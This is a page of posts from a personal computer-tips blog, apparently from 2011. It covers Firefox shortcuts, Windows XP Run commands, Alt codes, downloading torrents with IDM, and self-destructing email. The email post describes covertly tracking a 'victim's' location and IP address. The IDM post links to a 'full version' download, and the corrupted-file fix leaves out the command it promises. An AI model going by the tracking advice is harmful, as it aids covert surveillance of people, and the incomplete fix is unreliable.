Ctrl + Shift + Tab key : To select previous tab
Ctrl + 9 : To select last tab
Alt + Enter key : When you typed URL in address bar and you want to open it in a new window then type URL and Press Alt + Enter key.
F11 : To full screen.
F5 : Reload
If you want to Add and Remove buttons in Firefox Standard toolbar by clicking View Menu select Customize in Toolbar option here you can add and remove buttons. To add new button select and drag and drop where you want.
Mouse Shortcuts
Shift + Scroll down button : To go back
Middle click on the tab : To close tab
Ctrl + Scroll Up : To decrease font size
Ctrl + Scroll Down : to increase font size
Double click on tab toolbar : To load new tab
Labels:
Secrets Finally Revealed
Posted by
Pprasoon
at
07:37
0
comments
FIX all your corrupted files.
Heres' the Secret
Requirement:
*. First of all Scan your system with your updated antivirus thoroughly and ensure that all viruses and malwares are removed according to antivirus.
**. Now after scanning system, the only problem remains is corrupted files pop up messages that come because their dynamic linking has been modified by virus or due to some file deletion issues.
***. Now place your WINDOWS CD into CD/DVD drive.
****. After putting your CD. Go to Start and then open RUN.
*****. Now type the following command into RUN text field.
******. Now it will load all your windows file and fix all your corrupted files.
Labels:
Secrets Finally Revealed
Posted by
Pprasoon
at
07:31
0
comments
How to make self destructing E-MAIL
How to make self destructing E-MAIL follow the method.
Heres' the SECRET
*) First to make account on this site.
http://www.self-destructing-email.com/
http://www.destructingmessage.com/
http://anonymouse.org/anonemail.html
**) After creating successfully account and go to your regular mail account and send mail to friend
Ex. prasoon_nigam@yahoo.com.self-destructing-email.com
3) At vitim side that receive message and read message after 1 minute Email will remove
***) Now using self destructing service also track person location and ip who read your msg. Go to http://www.self-destructing-email.com/
Login your account in that site. And after you will see mail you send from other email account .and open it. You will get detail
Using this technique also you can find victim exact location and service provider ip address.
****) With http://www.destructingmessage.com/ Email will delete at certain level of time you allot time before you make an self destructive email and this works without registration
Labels:
Secrets Finally Revealed
Posted by
Pprasoon
at
00:01
0
comments
Here is a collection of 100 Commands
Monday, 24 October 2011
That can be entered in Start>Run in Windows XP, with their functions mentioned therein. I like it. If you can remember some important ones, you can save a lot of time.
Heres' the SECRET
Go to StartMenu>RUN shortcut key (window key + R)
There you can enter these commands to get the results mentioned.
Function & Command
———————- ————————-
Accessibility Controls
access.cpl
Add Hardware Wizard
hdwwiz.cpl
Add/Remove Programs
appwiz.cpl
Administrative Tools
control admintools
Automatic Updates
wuaucpl.cpl
Bluetooth Transfer Wizard
fsquirt
Calculator
calc
Certificate Manager
certmgr.msc
Character Map
charmap
Check Disk Utility
chkdsk
Clipboard Viewer
clipbrd
Command Prompt
cmd
Component Services
dcomcnfg
Computer Management
compmgmt.msc
Date and Time Properties
timedate.cpl
DDE Shares
ddeshare
Device Manager
devmgmt.msc
Direct X Control Panel (If Installed)*
directx.cpl
Direct X Troubleshooter
dxdiag
Disk Cleanup Utility
cleanmgr
Disk Defragment
dfrg.msc
Disk Management
diskmgmt.msc
Disk Partition Manager
diskpart
Display Properties
control desktop
Display Properties
desk.cpl
Display Properties (w/Appearance Tab Preselected)
control color
Dr. Watson System Troubleshooting Utility
drwtsn32
Driver Verifier Utility
verifier
Event Viewer
eventvwr.msc
File Signature Verification Tool
sigverif
Findfast
findfast.cpl
Folders Properties
control folders
Fonts
control fonts
Fonts Folder
fonts
Free Cell Card Game
freecell
Game Controllers
joy.cpl
Group Policy Editor (XP Prof)
gpedit.msc
Hearts Card Game
mshearts
Iexpress Wizard
iexpress
Indexing Service
ciadv.msc
Internet Properties
inetcpl.cpl
IP Configuration (Display Connection Configuration)
ipconfig /all
IP Configuration (Display DNS Cache Contents)
ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents)
ipconfig /flushdns
IP Configuration (Release All Connections)
ipconfig /release
IP Configuration (Renew All Connections)
ipconfig /renew
IP Configuration (Refreshes DHCP & Re-Registers DNS)
ipconfig /registerdns
IP Configuration (Display DHCP Class ID)
ipconfig /showclassid
IP Configuration (Modifies DHCP Class ID)
ipconfig /setclassid
ava Control Panel (If Installed)
jpicpl32.cpl
Java Control Panel (If Installed)
javaws
Keyboard Properties
control keyboard
Local Security Settings
secpol.msc
Local Users and Groups
lusrmgr.msc
Logs You Out Of Windows
logoff
Mcft Chat
winchat
Minesweeper Game
winmine
Mouse Properties
control mouse
Mouse Properties
main.cpl
Network Connections
control netconnections
Network Connections
ncpa.cpl
Network Setup Wizard
netsetup.cpl
Notepad
notepad
Nview Desktop Manager (If Installed)
nvtuicpl.cpl
Object Packager
packager
ODBC Data Source Administrator
odbccp32.cpl
On Screen Keyboard
osk
Opens AC3 Filter (If Installed)
ac3filter.cpl
Password Properties
password.cpl
Performance Monitor
perfmon.msc
Performance Monitor
perfmon
Phone and Modem Options
telephon.cpl
Power Configuration
powercfg.cpl
Printers and Faxes
control printers
Printers Folder
printers
Private Character Editor
eudcedit
Quicktime (If Installed)
QuickTime.cpl
Regional Settings
intl.cpl
Registry Editor
regedit
Registry Editor
regedit32
Remote Desktop
mstsc
Removable Storage
ntmsmgr.msc
Removable Storage Operator Requests
ntmsoprq.msc
Resultant Set of Policy (XP Prof)
rsop.msc
Scanners and Cameras
sticpl.cpl
Scheduled Tasks
control schedtasks
Security Center
wscui.cpl
Services
services.msc
Shared Folders
fsmgmt.msc
Shuts Down Windows
shutdown
Sounds and Audio
mmsys.cpl
Spider Solitare Card Game
spider
SQL Client Configuration
cliconfg
System Configuration Editor
sysedit
System Configuration Utility
msconfig
System File Checker Utility (Scan Immediately)
sfc /scannow
System File Checker Utility (Scan Once At Next Boot)
sfc /scanonce
System File Checker Utility (Scan On Every Boot)
sfc /scanboot
System File Checker Utility (Return to Default Setting)
sfc /revert
System File Checker Utility (Purge File Cache)
sfc /purgecache
System File Checker Utility (Set Cache Size to size x)
sfc /cachesize=x
System Properties
sysdm.cpl
Task Manager
taskmgr
Telnet Client
telnet
User Account Management
nusrmgr.cpl
Utility Manager
utilman
Windows Firewall
firewall.cpl
Windows Magnifier
magnify
Windows Management Infrastructure
wmimgmt.msc
Windows System Security Tool
syskey
Windows Update Launches
wupdmgr
Windows XP Tour Wizard
tourstart
Wordpad
Labels:
Secrets Finally Revealed
Posted by
Pprasoon
at
19:56
0
comments
How to Download Desired Torrent file with IDM!!
Saturday, 8 October 2011
H3r3's the Secret
STEPS:
*.* Download IDM (Internet download manager) full version :: Click on me
Second link for download IDM (Click On Me)
*. Download the torrent file(.torrent) which you want to download...!
**. Then just go to the website http://en.savefrom.net/ and upload the torrent file that you have just downloaded and click on the cache! button..,,!
***. This will give you a new torrent file . You just have to copy the link of the new torrent file from the opened window..,,..!
****. Then go to the website http://zbigz.com/ and create an account there(in case you don’t have) and login to your account. Then paste the address of the new torrent obtained in step 3 and click on Get button.,.,,...!
*****. Now you will get the list of available files present in that torrent file. Then click on the initiate bittorrent transmission button. This will give the full option to download the file. Just click on any link and you can see the download manager-IDM popping out for downloading the file.,.,.!!
Now enjoy the ultimate speed of IDM for downloading torrents too….:)
Labels:
Secrets Finally Revealed
Posted by
Pprasoon
at
21:23
1 comments
Alt Codes for using Keyboard Keys
Sunday, 2 October 2011
**. By pressing this key press any number given in the list 1 to 255 , then Leave these keys . You Will get the Required Symbol
Symbol | Number |
---|---|
☺ | 1 |
☻ | 2 |
♥ | 3 |
♦ | 4 |
♣ | 5 |
♠ | 6 |
• | 7 |
◘ | 8 |
○ | 9 |
◙ | 10 |
♂ | 11 |
♀ | 12 |
♪ | 13 |
♫ | 14 |
☼ | 15 |
► | 16 |
◄ | 17 |
↕ | 18 |
‼ | 19 |
¶ | 20 |
§ | 21 |
▬ | 22 |
↨ | 23 |
↑ | 24 |
↓ | 25 |
→ | 26 |
← | 27 |
∟ | 28 |
↔ | 29 |
▲ | 30 |
▼ | 31 |
space | 32 |
! | 33 |
" | 34 |
# | 35 |
$ | 36 |
% | 37 |
& | 38 |
' | 39 |
( | 40 |
) | 41 |
* | 42 |
+ | 43 |
, | 44 |
- | 45 |
. | 46 |
/ | 47 |
0 | 48 |
1 | 49 |
2 | 50 |
3 | 51 |
4 | 52 |
5 | 53 |
6 | 54 |
7 | 55 |
8 | 56 |
9 | 57 |
: | 58 |
; | 59 |
< | 60 |
= | 61 |
> | 62 |
? | 63 |
@ | 64 |
A | 65 |
B | 66 |
C | 67 |
D | 68 |
E | 69 |
F | 70 |
G | 71 |
H | 72 |
I | 73 |
J | 74 |
K | 75 |
L | 76 |
M | 77 |
N | 78 |
O | 79 |
P | 80 |
Q | 81 |
R | 82 |
S | 83 |
T | 84 |
U | 85 |
Symbol | Number |
---|---|
V | 86 |
W | 87 |
X | 88 |
Y | 89 |
Z | 90 |
[ | 91 |
\ | 92 |
] | 93 |
^ | 94 |
_ | 95 |
` | 96 |
a | 97 |
b | 98 |
c | 99 |
d | 100 |
e | 101 |
f | 102 |
g | 103 |
h | 104 |
i | 105 |
j | 106 |
k | 107 |
l | 108 |
m | 109 |
n | 110 |
o | 111 |
p | 112 |
q | 113 |
r | 114 |
s | 115 |
t | 116 |
u | 117 |
v | 118 |
w | 119 |
x | 120 |
y | 121 |
z | 122 |
{ | 123 |
| | 124 |
} | 125 |
~ | 126 |
⌂ | 127 |
Ç | 128 |
ü | 129 |
é | 130 |
â | 131 |
ä | 132 |
à | 133 |
å | 134 |
ç | 135 |
ê | 136 |
ë | 137 |
è | 138 |
ï | 139 |
î | 140 |
ì | 141 |
Ä | 142 |
Å | 143 |
É | 144 |
æ | 145 |
Æ | 146 |
ô | 147 |
ö | 148 |
ò | 149 |
û | 150 |
ù | 151 |
ÿ | 152 |
Ö | 153 |
Ü | 154 |
¢ | 155 |
£ | 156 |
¥ | 157 |
₧ | 158 |
ƒ | 159 |
á | 160 |
í | 161 |
ó | 162 |
ú | 163 |
ñ | 164 |
Ñ | 165 |
ª | 166 |
º | 167 |
¿ | 168 |
⌐ | 169 |
¬ | 170 |
Symbol | Number |
---|---|
½ | 171 |
¼ | 172 |
¡ | 173 |
« | 174 |
» | 175 |
░ | 176 |
▒ | 177 |
▓ | 178 |
│ | 179 |
┤ | 180 |
╡ | 181 |
╢ | 182 |
╖ | 183 |
╕ | 184 |
╣ | 185 |
║ | 186 |
╗ | 187 |
╝ | 188 |
╜ | 189 |
╛ | 190 |
┐ | 191 |
└ | 192 |
┴ | 193 |
┬ | 194 |
├ | 195 |
─ | 196 |
┼ | 197 |
╞ | 198 |
╟ | 199 |
╚ | 200 |
╔ | 201 |
╩ | 202 |
╦ | 203 |
╠ | 204 |
═ | 205 |
╬ | 206 |
╧ | 207 |
╨ | 208 |
╤ | 209 |
╥ | 210 |
╙ | 211 |
╘ | 212 |
╒ | 213 |
╓ | 214 |
╫ | 215 |
╪ | 216 |
┘ | 217 |
┌ | 218 |
█ | 219 |
▄ | 220 |
▌ | 221 |
▐ | 222 |
▀ | 223 |
α | 224 |
ß | 225 |
Γ | 226 |
π | 227 |
Σ | 228 |
σ | 229 |
µ | 230 |
τ | 231 |
Φ | 232 |
Θ | 233 |
Ω | 234 |
δ | 235 |
∞ | 236 |
φ | 237 |
ε | 238 |
∩ | 239 |
≡ | 240 |
± | 241 |
≥ | 242 |
≤ | 243 |
⌠ | 244 |
⌡ | 245 |
÷ | 246 |
≈ | 247 |
° | 248 |
∙ | 249 |
· | 250 |
√ | 251 |
ⁿ | 252 |
² | 253 |
■ | 254 |
255 |
Labels:
Secrets Finally Revealed
Posted by
Pprasoon
at
02:45
0
comments